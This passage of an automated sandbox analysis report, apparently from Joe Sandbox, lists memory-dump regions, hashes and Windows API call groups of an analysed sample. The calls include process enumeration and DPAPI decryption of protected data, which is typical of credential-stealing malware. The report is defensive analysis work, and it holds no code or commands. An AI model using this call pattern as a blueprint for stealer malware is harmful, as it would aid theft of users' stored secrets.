                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1AW_$P*]-$WI/o$kavm
                                • API String ID: 0-2141188312
                                • Opcode ID: 659c5719d6ca5a8276ecdae73c482f3dabe6ed71b217375d1857ccd5dc697de3
                                • Instruction ID: 04c75d055327a239765ead7401d18bf2cad6e16e6c4b65bff2f8f945bb74a6b4
                                • Opcode Fuzzy Hash: 659c5719d6ca5a8276ecdae73c482f3dabe6ed71b217375d1857ccd5dc697de3
                                • Instruction Fuzzy Hash: 75B217F360C2009FE704AE2DEC8567ABBE9EFD4320F1A463DE6C4C7744EA7558058696
                                APIs
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F3ABF
                                  • Part of subcall function 004F7310: lstrlen.KERNEL32(------,004D5BEB), ref: 004F731B
                                  • Part of subcall function 004F7310: lstrcpy.KERNEL32(00000000), ref: 004F733F
                                  • Part of subcall function 004F7310: lstrcat.KERNEL32(?,------), ref: 004F7349
                                  • Part of subcall function 004F7280: lstrcpy.KERNEL32(00000000), ref: 004F72AE
                                • CloseHandle.KERNEL32(00000000), ref: 004F3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: b59e5930e4c223f63380b8cc869c1bfabee7e777e87e98897c0faf87d71793f7
                                • Instruction ID: a4119af28f3e19fe33b37615fbc9f11e5b427be20cab9f7c924e6da0abf4c99f
                                • Opcode Fuzzy Hash: b59e5930e4c223f63380b8cc869c1bfabee7e777e87e98897c0faf87d71793f7
                                • Instruction Fuzzy Hash: 2A810871900209CFC714CF19C958BA6B7B1FB44319F29C1AAD5089B3B2D77AAD82CF48
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 004DEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 004DEA7E
                                • lstrcat.KERNEL32(004FCFEC,004FCFEC), ref: 004DEB27
                                • lstrcat.KERNEL32(004FCFEC,004FCFEC), ref: 004DEB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 6c15a69847f60619809947bdf8985025a1855a7308b827079464ba3a9cb66068
                                • Instruction ID: c2c02da8fff68b34bf47e98b8559cd93644372c87051cd7473c43e4b6bc283e5
                                • Opcode Fuzzy Hash: 6c15a69847f60619809947bdf8985025a1855a7308b827079464ba3a9cb66068
                                • Instruction Fuzzy Hash: 3331D575A0011DEBDB10DB58EC45FEFB77DDF44705F008166FA09E6280DBB46A048BAA
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004F40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004F40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004F4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 4a5ee60e4c133035a3d535e8c5b4938606cbf43cf5cea521a7d7b1308509f68a
                                • Instruction ID: e05d86601126a2685c6376b6be4e811986aca5cbf80144097bedd532bfb4afe5
                                • Opcode Fuzzy Hash: 4a5ee60e4c133035a3d535e8c5b4938606cbf43cf5cea521a7d7b1308509f68a
                                • Instruction Fuzzy Hash: F4011E70600209AFDB109FA5DC85B6BBBADEF85311F108159BE49C7350DE759940CB59
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,004FA3D0,000000FF), ref: 004F2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004F2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,004FA3D0,000000FF), ref: 004F2BA2
                                • wsprintfA.USER32 ref: 004F2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: ab58e589f2b3fa85e449932bccc0915f082e6730fcd5cc396de99a442b0d20ad
                                • Instruction ID: 21c03d9e9ab3ab5a24f34337c0719f433497c4f6a1a059135681d1c7c46c35c0
                                • Opcode Fuzzy Hash: ab58e589f2b3fa85e449932bccc0915f082e6730fcd5cc396de99a442b0d20ad
                                • Instruction Fuzzy Hash: 61012DB2904529EBCB149BD9DD45BBFB7BCFB4CB11F00421AFA45A2290EA7C5440C7B5
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004D9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004D9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004D9B61
                                • LocalFree.KERNEL32 ref: 004D9B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 3213c834c0f3d90d487b8b5ee8709761db284b5607329075204299cfd6022bbf
                                • Instruction ID: 970506dae17401234e7e47f3b73d43f71fc959ca7eccf684225b0db7f157d624
                                • Opcode Fuzzy Hash: 3213c834c0f3d90d487b8b5ee8709761db284b5607329075204299cfd6022bbf
                                • Instruction Fuzzy Hash: 50F01D70340312BBE7301F64AC59F677BA8EF04B50F214116FA45EA3D0DBB89C40CAA8
                                APIs
                                • CoCreateInstance.COMBASE(004FB110,00000000,00000001,004FB100,?), ref: 004ECB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 004ECB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 004ECBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: ec54e3524ccb101657db0bb6632c7ee90a7560af4918c44e53998459bf415810
                                • Instruction ID: 8460c77bb7d72d10f94cc5a5c16bdaa9c5cc20d710e70ed00eb2c9e9ee2cbbb0
                                • Opcode Fuzzy Hash: ec54e3524ccb101657db0bb6632c7ee90a7560af4918c44e53998459bf415810
                                • Instruction Fuzzy Hash: 37316471A40619AFD710DB94CC82FAAB7B9DB88B11F1042C5FA14EB2D0D7B4BE45CB94
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004D9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004D9BB3
                                • LocalFree.KERNEL32(?), ref: 004D9BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: d136809ae2e9571a076ef7cf07a377d2790a60c624c3eeb22bf6f14d86eca57c
                                • Instruction ID: 38db589c3afbb423155af7c56f24f5c9c0e23891980780b85e1fd44002a25546
                                • Opcode Fuzzy Hash: d136809ae2e9571a076ef7cf07a377d2790a60c624c3eeb22bf6f14d86eca57c
                                • Instruction Fuzzy Hash: 71011275A4120AABD710DBA4DC55FABB778EB44700F104555EA05EB381DB74AD0087D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1:{$??_
                                • API String ID: 0-2247555130
                                • Opcode ID: efba66dfaccaf5b15280351383005aed5acb1181aa6030f2074af2fe9e50eeac
                                • Instruction ID: 4ce4203b6b7bac496bcb8775df8be4c861d53aecf6ffafa66d951ebb9069f49c
                                • Opcode Fuzzy Hash: efba66dfaccaf5b15280351383005aed5acb1181aa6030f2074af2fe9e50eeac
                                • Instruction Fuzzy Hash: 16B228B360C2049FD3046E29EC8567AFBE9EFD4720F1A8A3DE6C487744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %)$DpK$l2{
                                • API String ID: 0-4148513593
                                • Opcode ID: 220431d182ed26140c0fae5b0bf2434d5a43c9a7adcf426c98421f9a5e97f0b0
                                • Instruction ID: b2a61d078fb6f8998e908161eec1565d0b3d038bedaefe862e8714d5752bf6f1
                                • Opcode Fuzzy Hash: 220431d182ed26140c0fae5b0bf2434d5a43c9a7adcf426c98421f9a5e97f0b0
                                • Instruction Fuzzy Hash: B16129F3E082105FF3049A2CED4176AB6D7EBD4720F2A863DEA88C77C4E93D59054696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: E2r$_zW
                                • API String ID: 0-2800289764
                                • Opcode ID: 02c2f734af9e7d99ae38fa77170512d8dd3c01a2191f8a5e062cf21b664c996c
                                • Instruction ID: b4084d32ec56ccb68f31e192b5494f84c451595d3bdc6190df60dcc7c189fa74
                                • Opcode Fuzzy Hash: 02c2f734af9e7d99ae38fa77170512d8dd3c01a2191f8a5e062cf21b664c996c
                                • Instruction Fuzzy Hash: C86125F3E082145BE3086D2DEC95776B7CAEF90720F2B463DEA9497384E8795C0582D6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
